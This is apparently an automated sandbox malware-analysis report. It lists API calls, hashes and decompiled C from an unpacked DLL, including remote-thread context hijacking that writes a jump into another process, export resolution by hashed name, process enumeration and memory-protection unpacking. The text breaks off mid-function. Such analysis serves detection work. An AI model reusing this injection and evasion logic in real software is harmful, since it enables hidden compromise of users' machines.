                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                                                                                                                                                                                • String ID: Hello qqq
                                                                                                                                                                                                • API String ID: 3435743081-3610097158
                                                                                                                                                                                                • Opcode ID: 06ff6eb8eaa457d7cf6ef365445eacd114f838b847e03b57660ef2c27bb21647
                                                                                                                                                                                                • Instruction ID: 302d5c5ac892887bccd1c7cb77e125985df951ac9c87ae0613dda5153ae7e50a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 06ff6eb8eaa457d7cf6ef365445eacd114f838b847e03b57660ef2c27bb21647
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31C374900254ABFB50DB60CC89EAF37B9EF483D1F208129F959D6199DB34EB44CB22
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000668,00003000,00000040,00000668,1006B958), ref: 1006BFC3
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000179,00003000,00000040,1006B9B8), ref: 1006BFFA
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00023713,00003000,00000040), ref: 1006C05A
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1006C090
                                                                                                                                                                                                • VirtualProtect.KERNEL32(10000000,00000000,00000004,1006BEE5), ref: 1006C195
                                                                                                                                                                                                • VirtualProtect.KERNEL32(10000000,00001000,00000004,1006BEE5), ref: 1006C1BC
                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,1006BEE5), ref: 1006C289
                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,1006BEE5,?), ref: 1006C2DF
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1006C2FB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2574235972-0
                                                                                                                                                                                                • Opcode ID: 829fb23694ff34e194c5e2cf2250b18a96e34f8bd3d334ff578e1805b3364683
                                                                                                                                                                                                • Instruction ID: 14006f8252920c6ae118e49af7f968b6d8dac2f8d3e8c870e18e0d4c9ed26aa4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 829fb23694ff34e194c5e2cf2250b18a96e34f8bd3d334ff578e1805b3364683
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FD128725032419FDB91CF24C980E6177A6FB4A310B2946D4AD0E9F26ADE3DB850CB72
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000CBB9(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				intOrPtr _v23;
                                                                                                                                                                                                				void _v24;
                                                                                                                                                                                                				long _v28;
                                                                                                                                                                                                				struct _CONTEXT _v744;
                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				struct HINSTANCE__* _t32;
                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                				long _t65;
                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                				void** _t73;
                                                                                                                                                                                                				void* _t74;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t73 = __edx;
                                                                                                                                                                                                				_t63 = __ecx;
                                                                                                                                                                                                				_t74 = 0;
                                                                                                                                                                                                				if(E1000C510(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                                                					_t39 = E1000C702( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                                                					_t74 = _t39;
                                                                                                                                                                                                					if(_t74 != 0) {
                                                                                                                                                                                                						memset( &_v744, 0, 0x2cc);
                                                                                                                                                                                                						_v744.ContextFlags = 0x10002;
                                                                                                                                                                                                						if(GetThreadContext(_t73[1],  &_v744) != 0) {
                                                                                                                                                                                                							_t70 = _v744.Eax;
                                                                                                                                                                                                							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                							_v24 = 0xe9;
                                                                                                                                                                                                							_t65 = 5;
                                                                                                                                                                                                							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                                                                                                                                                                                                							_v8 = _t65;
                                                                                                                                                                                                							_v16 = _t70;
                                                                                                                                                                                                							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
                                                                                                                                                                                                								L6:
                                                                                                                                                                                                								_t74 = 0;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t32 =  *0x1001e77c; // 0x0
                                                                                                                                                                                                				if(_t32 != 0) {
                                                                                                                                                                                                					FreeLibrary(_t32);
                                                                                                                                                                                                					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t33 =  *0x1001e784; // 0x0
                                                                                                                                                                                                				if(_t33 != 0) {
                                                                                                                                                                                                					_t35 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                                                                                                                                                                                                					E100085FB(0x1001e784, 0xfffffffe);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t74;
                                                                                                                                                                                                				}

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000C510: LoadLibraryW.KERNEL32 ref: 1000C608
                                                                                                                                                                                                  • Part of subcall function 1000C510: memset.MSVCRT ref: 1000C647
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CCB5
                                                                                                                                                                                                  • Part of subcall function 1000C702: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CCD), ref: 1000C775
                                                                                                                                                                                                  • Part of subcall function 1000C702: RegisterClassExA.USER32(00000030), ref: 1000C7C7
                                                                                                                                                                                                  • Part of subcall function 1000C702: CreateWindowExA.USER32 ref: 1000C7F2
                                                                                                                                                                                                  • Part of subcall function 1000C702: DestroyWindow.USER32(00000000), ref: 1000C7FD
                                                                                                                                                                                                  • Part of subcall function 1000C702: UnregisterClassA.USER32 ref: 1000C808
                                                                                                                                                                                                • memset.MSVCRT ref: 1000CBFA
                                                                                                                                                                                                • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CC1B
                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC64
                                                                                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC81
                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CCA2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 850789531-0
                                                                                                                                                                                                • Opcode ID: 9eab91cf71bffb947258017bf067e6f8b047ae0e76e601099a3b8dfafea9ea2a
                                                                                                                                                                                                • Instruction ID: b74b7ad64cb86760f2f547b1f56bdb80a1078b1eafb2e764bbaace3cce1a3b62
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eab91cf71bffb947258017bf067e6f8b047ae0e76e601099a3b8dfafea9ea2a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C314B76A00219AFFB01CFA8CD89FDEB7B8EF08394F104165E505D62A4E730EE448B91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000ABE5(intOrPtr __ecx, void* __edx) {
                                                                                                                                                                                                				void* _v304;
                                                                                                                                                                                                				void* _v308;
                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                				_t31 = __edx; // executed
                                                                                                                                                                                                				_t14 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                				_t42 = _t14;
                                                                                                                                                                                                				_t15 = _t14 | 0xffffffff;
                                                                                                                                                                                                				if(_t42 != _t15) {
                                                                                                                                                                                                					memset( &_v304, 0, 0x128);
                                                                                                                                                                                                					_v304 = 0x128;
                                                                                                                                                                                                					if(Process32First(_t42,  &_v304) != 0) {
                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                							_t22 = E1000CD02(_t33,  &_v308, _t31); // executed
                                                                                                                                                                                                							_t40 = _t22;
                                                                                                                                                                                                							if(_t40 == 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t33 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							if(Process32Next(_t42,  &_v308) != 0) {
                                                                                                                                                                                                								continue;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						CloseHandle(_t42);
                                                                                                                                                                                                						_t15 = 0 | _t40 == 0x00000000;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t28 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                                                                                                                                                                                                						_t15 = 0xfffffffe;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABFF
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AC18
                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 1000AC2F
                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 1000AC63
                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 1000AC70
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1267121359-0
                                                                                                                                                                                                • Opcode ID: 0aa293739a954841e9fd1fe14ce378430b4240327dca0120948fa1dd664b7ec6
                                                                                                                                                                                                • Instruction ID: 013a5f736d5b7b9acb904e4d8031e299c78d360c791acb72ef8c4c0d1b8f3efb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aa293739a954841e9fd1fe14ce378430b4240327dca0120948fa1dd664b7ec6
                                                                                                                                                                                                • Instruction Fuzzy Hash: D011C1722043516BE310DB68CC89F9F37ECEB893E0F120629F520CB181EB30D8008766
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000DFEF(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                				struct HINSTANCE__* _t58;
                                                                                                                                                                                                				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                				char _t70;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                				CHAR* _t80;
                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                
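                                                                                                                                                                                                				// __ecx is treated as the base of a loaded PE image; __edx is the value the hashed export name must match.
                                                                                                                                                                                                				_t75 = __ecx;
                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                				_t60 =  *((intOrPtr*)(__ecx + 0x3c)); // e_lfanew: offset of the NT headers
                                                                                                                                                                                                				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78)); // RVA of the export directory (PE32 data directory entry 0)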
                                                                                                                                                                                                				if(_t41 == 0) {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
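                                                                                                                                                                                                				_t62 = _t41 + __ecx; // export directory in memory
                                                                                                                                                                                                				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx; // AddressOfNameOrdinals
                                                                                                                                                                                                				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx; // AddressOfNames
                                                                                                                                                                                                				_t63 =  *((intOrPtr*)(_t62 + 0x18)); // NumberOfNames
                                                                                                                                                                                                				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx; // AddressOfFunctions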
                                                                                                                                                                                                				_t47 = 0;
                                                                                                                                                                                                				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v16 = _t63;
                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					L2:
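                                                                                                                                                                                                					// E1000D442 is applied to each export name; its result XORed with 0x218fe95b is compared
                                                                                                                                                                                                					// with the requested value, so the export is looked up by hash rather than by a plaintext name.
                                                                                                                                                                                                					_t49 = E1000D442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                                					_t51 = _v8;
                                                                                                                                                                                                					if((_t49 ^ 0x218fe95b) == _v12) {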
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t73 = _v20;
                                                                                                                                                                                                					_t47 = _t51 + 1;
                                                                                                                                                                                                					_v8 = _t47;
                                                                                                                                                                                                					if(_t47 < _v16) {
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
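                                                                                                                                                                                                				// Name index -> ordinal -> function address. An address that falls inside the export
                                                                                                                                                                                                				// directory (offset 0x7c holds its size) is a forwarder string ("DLL.Function"), not code.
                                                                                                                                                                                                				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                                				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                                				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {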
                                                                                                                                                                                                					return _t80;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t56 = 0;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_t70 = _t80[_t56];
                                                                                                                                                                                                						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                                						_t56 = _t56 + 1;
                                                                                                                                                                                                						if(_t56 < 0x40) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
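                                                                                                                                                                                                					// Append ".dll" (0x6c6c642e in little-endian byte order) to the copied module name and terminate it.
                                                                                                                                                                                                					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                                					 *((char*)(_t82 + _t56 - 0x54)) = 0;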
                                                                                                                                                                                                					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                                						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                                					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                                					if(_t58 == 0) {
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                                					if(_t59 == 0) {
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t59;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}


























                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(.dll,1000604E,0000011C,00000000), ref: 1000E0BF
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E0CB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                                • API String ID: 2574300362-2738580789
                                                                                                                                                                                                • Opcode ID: 54313e2ad0f9216a25889339fdb8d5bfede618fbf4471c27fd8460f88c62a8b8
                                                                                                                                                                                                • Instruction ID: 2b010cf349d1f56d5a7d2dbb0e1c5a40c32b3674a8f2f7ce5b3a03b67c5868ca
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54313e2ad0f9216a25889339fdb8d5bfede618fbf4471c27fd8460f88c62a8b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE31E131A002998BEB54CFA9C8C0BAEBBF5EF44384F244469D805E7349DBB0DD91CB90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(1007958C,0000504A,@&JP,?), ref: 1003FEB9
                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000680,1006AAF8), ref: 1003FF5B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389031697.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PathProtectTempVirtual
                                                                                                                                                                                                • String ID: &JP$&JP$@&JP$JP
                                                                                                                                                                                                • API String ID: 3422257996-101263471
                                                                                                                                                                                                • Opcode ID: 6af33f0a8db61a6b0f94e8de214087de556935fe5d6c66ba85c079bf9a38abc5
                                                                                                                                                                                                • Instruction ID: 12c374ae936a352f8aa530e33edcbf826ee8ce32f596dbea76b5d1032cef70ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6af33f0a8db61a6b0f94e8de214087de556935fe5d6c66ba85c079bf9a38abc5
                                                                                                                                                                                                • Instruction Fuzzy Hash: A79160719041A5DFEB04CF69C9D08EC7BBBEB4870AB05C16AD44497B65D3FA5A44CF40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E100049FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                                				char _v516;
                                                                                                                                                                                                				void _v1044;
                                                                                                                                                                                                				char _v1076;
                                                                                                                                                                                                				signed int _v1080;
                                                                                                                                                                                                				signed int _v1096;
                                                                                                                                                                                                				WCHAR* _v1100;
                                                                                                                                                                                                				intOrPtr _v1104;
                                                                                                                                                                                                				signed int _v1108;
                                                                                                                                                                                                				intOrPtr _v1112;
                                                                                                                                                                                                				intOrPtr _v1116;
                                                                                                                                                                                                				char _v1144;
                                                                                                                                                                                                				char _v1148;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                				WCHAR* _t87;
                                                                                                                                                                                                				void* _t89;
                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                				signed int _t91;
                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                				WCHAR* _t96;
                                                                                                                                                                                                				intOrPtr _t106;
                                                                                                                                                                                                				intOrPtr _t107;
                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                				signed char _t116;
                                                                                                                                                                                                				WCHAR* _t118;
                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                				intOrPtr _t125;
                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                				void* _t129;
                                                                                                                                                                                                				WCHAR* _t130;
                                                                                                                                                                                                				void* _t134;
                                                                                                                                                                                                				void* _t141;
                                                                                                                                                                                                				void* _t143;
                                                                                                                                                                                                				WCHAR* _t145;
                                                                                                                                                                                                				signed int _t153;
                                                                                                                                                                                                				void* _t154;
                                                                                                                                                                                                				void* _t178;
                                                                                                                                                                                                				signed int _t180;
                                                                                                                                                                                                				void* _t181;
                                                                                                                                                                                                				void* _t183;
                                                                                                                                                                                                				void* _t187;
                                                                                                                                                                                                				signed int _t188;
                                                                                                                                                                                                				WCHAR* _t190;
                                                                                                                                                                                                				signed int _t191;
                                                                                                                                                                                                				signed int _t192;
                                                                                                                                                                                                				intOrPtr* _t194;
                                                                                                                                                                                                				signed int _t196;
                                                                                                                                                                                                				void* _t199;
                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                				void* _t201;
                                                                                                                                                                                                				void* _t202;
                                                                                                                                                                                                				intOrPtr* _t203;
                                                                                                                                                                                                				void* _t208;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t208 = __fp0;
                                                                                                                                                                                                				_push(_t191);
                                                                                                                                                                                                				_t128 = __edx;
                                                                                                                                                                                                				_t187 = __ecx;
                                                                                                                                                                                                				_t192 = _t191 | 0xffffffff;
                                                                                                                                                                                                				memset( &_v1044, 0, 0x20c);
                                                                                                                                                                                                				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                                                                                                                                                                                				_v1108 = 1;
                                                                                                                                                                                                				if(_t187 != 0) {
                                                                                                                                                                                                					_t123 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t3 = _t123 + 0x110; // 0x4d2fb70
                                                                                                                                                                                                					_t125 =  *0x1001e68c; // 0x4d2fa40
                                                                                                                                                                                                					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *_t3)));
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(E1000BBCF(_t187) != 0) {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					_t134 = _t128;
                                                                                                                                                                                                					_t66 = E1000B7EA(_t134,  &_v516);
                                                                                                                                                                                                					_push(_t134);
                                                                                                                                                                                                					_v1104 = _t66;
                                                                                                                                                                                                					E1000B6BF(_t66,  &_v1076, _t206, _t208);
                                                                                                                                                                                                					_t129 = E100049BA( &_v1076,  &_v1076, _t206);
                                                                                                                                                                                                					_t141 = E1000D442( &_v1076, E1000C3BB( &_v1076), 0);
                                                                                                                                                                                                					E1000B8CC(_t141,  &_v1100, _t208);
                                                                                                                                                                                                					_t175 =  &_v1076;
                                                                                                                                                                                                					_t73 = E10002C82(_t187,  &_v1076, _t206, _t208);
                                                                                                                                                                                                					_v1112 = _t73;
                                                                                                                                                                                                					_t143 = _t141;
                                                                                                                                                                                                					if(_t73 != 0) {
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_t129);
                                                                                                                                                                                                						_push("\\");
                                                                                                                                                                                                						_t130 = E100092C6(_t73);
                                                                                                                                                                                                						_t200 = _t199 + 0x10;
                                                                                                                                                                                                						_t75 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                                                                                                                                                                                						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                                                                                                                                                                                							L12:
                                                                                                                                                                                                							__eflags = _v1108;
                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                								_t76 = E100091C4(_v1112);
                                                                                                                                                                                                								_t145 = _t130;
                                                                                                                                                                                                								 *0x1001e740 = _t76;
                                                                                                                                                                                                								 *0x1001e738 = E100091C4(_t145);
                                                                                                                                                                                                								L17:
                                                                                                                                                                                                								_push(_t145);
                                                                                                                                                                                                								_t188 = E10009B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                                                                                                                                                                                                								_t201 = _t200 + 0x10;
                                                                                                                                                                                                								__eflags = _t188;
                                                                                                                                                                                                								if(_t188 == 0) {
                                                                                                                                                                                                									goto L41;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_push(0x1001b9c6);
                                                                                                                                                                                                								E10009F13(0xe);
                                                                                                                                                                                                								E10009F37(_t188, _t208, _t130);
                                                                                                                                                                                                								_t194 = _a4;
                                                                                                                                                                                                								_v1096 = _v1096 & 0x00000000;
                                                                                                                                                                                                								_push(2);
                                                                                                                                                                                                								_v1100 =  *_t194;
                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                								_push( &_v1100);
                                                                                                                                                                                                								_t178 = 0xb;
                                                                                                                                                                                                								E1000A076(_t188, _t178, _t208);
                                                                                                                                                                                                								_t179 =  *(_t194 + 0x10);
                                                                                                                                                                                                								_t202 = _t201 + 0xc;
                                                                                                                                                                                                								__eflags =  *(_t194 + 0x10);
                                                                                                                                                                                                								if( *(_t194 + 0x10) != 0) {
                                                                                                                                                                                                									E1000A3D8(_t188, _t179, _t208);
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t180 =  *(_t194 + 0xc);
                                                                                                                                                                                                								__eflags = _t180;
                                                                                                                                                                                                								if(_t180 != 0) {
                                                                                                                                                                                                									E1000A3D8(_t188, _t180, _t208);
                                                                                                                                                                                                								}
